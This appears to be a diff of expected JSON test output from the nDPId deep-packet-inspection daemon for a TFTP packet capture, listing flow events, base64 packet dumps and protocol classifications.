-00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":99,"total-skipped-flows":0,"total-l4-payload-len":25011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1626968644630} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626968644630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1626968644630,"pkt":"eCSvPj0DAFBWn8+KCABFAAAuYudAAEARdJqsHAVbrBwFqq5KAEUAGkfgAAJ6ei5iaW4AbmV0YXNjaWkA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644631,"flow_last_seen":1626968644631,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1626968644631,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1626968644631,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1626968644631,"pkt":"AFBWn8+KeCSvPj0DCABFAAAgqt8AAEARbLCsHAWqrBwFW\/JqrkoADPveAAQAAA=="} -01208{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1626968644632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1626968644632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYuhAAEARcqesHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} -01208{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1626968644632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":1626968644632,"pkt":"eCSvPj0DAFBWn8+KCABFAAIgYulAAEARcqasHAVbrBwFqq5K8moCDEJWAAMAAR+LCACcqPdgAAPs3L1untmCpufcR\/GhA5oMuEVS\/wLGCRUYA5RkCLATYQCzRPW0DIrcoKTq6cweH4fPYWDDgR3MMew+I389YwMFOnD6+MaFNxG1tLiuquiOnn\/96+5wdXG4eP3u5at3V88Pjw+\/fn59PL\/9+sevm\/vD3bff7x7+7b\/9dv9vz3\/8vD3+8d3h8Pnh8dvxbw4\/Hv7+5z\/ePH79V3\/3+OOffhzPbv\/u8OMf\/7uvjz++Pdz\/q79785erF3+5+LvDvzv\/67fbf\/V3ly+vnv\/LD9\/u\/\/7hX\/3dP\/z8+dd3z5794z\/+41\/+78t\/+fLw\/e\/+zeH\/+VWHf7z5cfiv\/9v\/5uvtf\/Gv\/38u\/P3x7ufPf\/r8\/O2rf\/Pu8Pff7r4ejr\/h59fvh+8Pv+5\/Hr4+Pj48vjv8+vH73\/\/4\/J\/\/7fl\/+uHfHM7\/q8OzP24enz3+un\/2n0+e\/aeTd4e\/\/S9\/+9\/\/+d8f\/vnf\/+0\/\/O3\/\/Nt\/\/Nv\/9rf\/ePjn\/\/mf\/6d\/\/vf\/\/D8ef\/w\/\/uVPf\/tf\/\/Yf0NDQ0NDQ0Oq0V09oN\/c3Xx4f7j8\/v3j+4oj71w+\/H\/77f\/mLv9zefLv7p\/\/ycPyn37\/d3\/z8fyXM\/8cv+vDw+P3m7vD13337eTi9PPwPx997\/G84e\/JL3uz+j0JDQ0NDQ0Or0Z7vJhoaGhoa"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1626968644631,"flow_last_seen":1626968644632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1367411052077,"flow_last_seen":1367411052258,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":24991,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1626968644632,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} -00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":104,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":104,"packets-processed":104,"total-skipped-flows":0,"total-l4-payload-len":26069,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1626968644632} +00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946730124846} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54626,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":946730124846,"pkt":"9Opn97JCCAAnntJbCABFAAAv+hlAAEAR3pisHAQ1rBAFqtViAEUAGx52AAEAAAAAAAAAAAAAAG9jdGV0AA=="} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54626,"dst_port":69,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54632,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":51,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":51,"pkt_l4_len":17,"thread_ts_msec":946730124846,"pkt":"9Opn97JCCAAnntJbCABFAAAl+hlAAEAR3pisHAQ1rBAFqtVoAEUAER52AAEAb2N0ZXQA"} +00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54632,"dst_port":69,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":946730124846,"pkt":"AFCN14tDAAu+GJpACABFAAAwAAAAAP8ROWXAqAD9wKgACsW6AEUAHD4gAAFyZmMxMzUwLnR4dABvY3RldAA="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":516,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946730124846,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkyUAAIARI1DAqAAKwKgA\/Q11xboCDNSjAAMAAQoKCgoKCk5ldHdvcmsgV29ya2luZyBHcm91cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSy4gU29sbGlucwpSZXF1ZXN0IEZvciBDb21tZW50czogMTM1MCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNSVQKU1REOiAzMyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSnVseSAxOTkyCk9ic29sZXRlczogUkZDIDc4MwoKCiAgICAgICAgICAgICAgICAgICAgIFRIRSBURlRQIFBST1RPQ09MIChSRVZJU0lPTiAyKQoKU3RhdHVzIG9mIHRoaXMgTWVtbwoKICAgVGhpcyBSRkMgc3BlY2lmaWVzIGFuIElBQiBzdGFuZGFyZHMgdHJhY2sgcHJvdG9jb2wgZm9yIHRoZSBJbnRlcm5ldAogICBjb21tdW5pdHksIGFuZCByZXF1ZXN0cyBkaXNjdXNzaW9uIGFuZCBzdWdnZXN0aW9ucyBmb3IgaW1wcm92ZW1lbnRzLgogICBQbGVhc2UgcmVmZXIgdG8gdGhlIGN1cnJlbnQgZWRpdGlvbiBvZiB0aGUgIklB"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":946730124846,"pkt":"AFCN14tDAAu+GJpACABFAAAgAAEAAP8ROXTAqAD9wKgACsW6DXUADKpJAAQAAQAAAAAAAAAAAAAAAAAA"} +01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946730124846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"thread_ts_msec":946730124846,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkycAAIARI07AqAAKwKgA\/Q11xboCDOXlAAMAAkIgT2ZmaWNpYWwgUHJvdG9jb2wKICAgU3RhbmRhcmRzIiBmb3IgdGhlIHN0YW5kYXJkaXphdGlvbiBzdGF0ZSBhbmQgc3RhdHVzIG9mIHRoaXMgcHJvdG9jb2wuCiAgIERpc3RyaWJ1dGlvbiBvZiB0aGlzIG1lbW8gaXMgdW5saW1pdGVkLgoKU3VtbWFyeQoKICAgVEZUUCBpcyBhIHZlcnkgc2ltcGxlIHByb3RvY29sIHVzZWQgdG8gdHJhbnNmZXIgZmlsZXMuICBJdCBpcyBmcm9tCiAgIHRoaXMgdGhhdCBpdHMgbmFtZSBjb21lcywgVHJpdmlhbCBGaWxlIFRyYW5zZmVyIFByb3RvY29sIG9yIFRGVFAuCiAgIEVhY2ggbm9udGVybWluYWwgcGFja2V0IGlzIGFja25vd2xlZGdlZCBzZXBhcmF0ZWx5LiAgVGhpcyBkb2N1bWVudAogICBkZXNjcmliZXMgdGhlIHByb3RvY29sIGFuZCBpdHMgdHlwZXMgb2YgcGFja2V0cy4gIFRoZSBkb2N1bWVudCBhbHNvCiAgIGV4cGxhaW5zIHRoZSByZWFzb25zIGJlaGluZCBzb21lIG9mIHRoZSBkZXNpZ24gZGVjaXNpb25zLgoKQWNrbm93bGVnZW1lbnRzCgogICBUaGUg"} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":946730124846,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":101,"total-skipped-flows":0,"total-l4-payload-len":25039,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":946733724846} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946733724846,"flow_last_seen":946733724846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54627,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946733724846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":946733724846,"pkt":"9Opn97JCCAAnntJbCABFAAAv+hlAAEAR3pisHAQ1rBAFqtVjAEUAGx52AAFzeXNtYW4ubGlzAG9jdGV0AA=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"tftp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946733724846,"flow_last_seen":946733724846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54627,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54626,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00790{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"172.28.4.53","dst_ip":"172.16.5.170","src_port":54632,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":24991,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":103,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946730124846,"flow_last_seen":946730124846,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":946733724846,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}} 